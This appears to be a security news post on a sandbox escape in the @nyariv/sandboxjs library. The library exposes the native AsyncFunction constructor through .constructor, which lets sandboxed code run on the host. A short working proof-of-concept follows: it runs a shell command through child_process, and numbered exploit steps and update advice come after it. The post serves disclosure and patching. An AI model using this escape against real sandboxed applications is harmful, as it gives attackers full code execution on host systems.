@nyariv/sandboxjs, Sandbox Escape, CVE-2023-29080 (Critical)

Listen to this Post

The vulnerability is a sandbox escape leading to Remote Code Execution in the `@nyariv/sandboxjs` library. The library’s security model relies on intercepting and replacing unsafe global constructors, like Function, with a safe `SandboxFunction` version. This replacement mapping is defined within utils.ts. However, the library failed to include analogous safe mappings for the AsyncFunction, GeneratorFunction, and `AsyncGeneratorFunction` constructors. While these constructors are not directly accessible as global properties, they can be retrieved through the `.constructor` property of an instance, such as (async () => {}).constructor. Within the sandbox’s `executor.ts` logic, when code accesses this `.constructor` property on an allowed async function, the system performs a lookup. Since `AsyncFunction` is absent from the safe-replacement map, the executor inadvertently returns the native, host `AsyncFunction` constructor. In JavaScript, constructors like `Function` and `AsyncFunction` create new functions that execute in the global scope, outside any sandbox. By obtaining this host constructor, an attacker can define a new async function whose body is arbitrary code. This code then executes with full privileges of the host Node.js or browser environment, completely bypassing all sandbox restrictions and resulting in full Remote Code Execution.
Platform: @nyariv/sandboxjs
Version: < 1.3.0
Vulnerability : Sandbox Escape
Severity: Critical
date: 2023-03-31

Prediction: Patched 2023-04-05

What Undercode Say:

npm list @nyariv/sandboxjs
node poc.js
// poc.js
const sandbox = require('@nyariv/sandboxjs');
const s = new sandbox.default();
const payload = <code>const af = async () => {};
const HostAsyncConstructor = af.constructor;
const func = HostAsyncConstructor("return process.mainModule.require('child_process').execSync('id').toString()");
const p = func();
p.then(console.log);</code>;
s.compile(payload)().run();

How Exploit:

1. Create async function inside sandbox.

2. Access its `.constructor` property.

3. Receive native `AsyncFunction`.

4. Constructor creates arbitrary function.

5. Execute for host RCE.

Protection from this CVE:

Update to version 1.3.0.

Implement complete constructor mapping.

Audit property access intercepts.

Impact:

Full Remote Code Execution.

Complete sandbox bypass.

Host environment compromise.

🎯Let’s Practice Exploiting & Learn Patching For Free:

Sources:

Reported By: github.com
Extra Source Hub:
Undercode

🔐JOIN OUR CYBER WORLD [ CVE News • HackMonitor • UndercodeNews ]

💬 Whatsapp | 💬 Telegram

📢 Follow DailyCVE & Stay Tuned:

𝕏 formerly Twitter 🐦 | @ Threads | 🔗 Linkedin Featured Image

Scroll to Top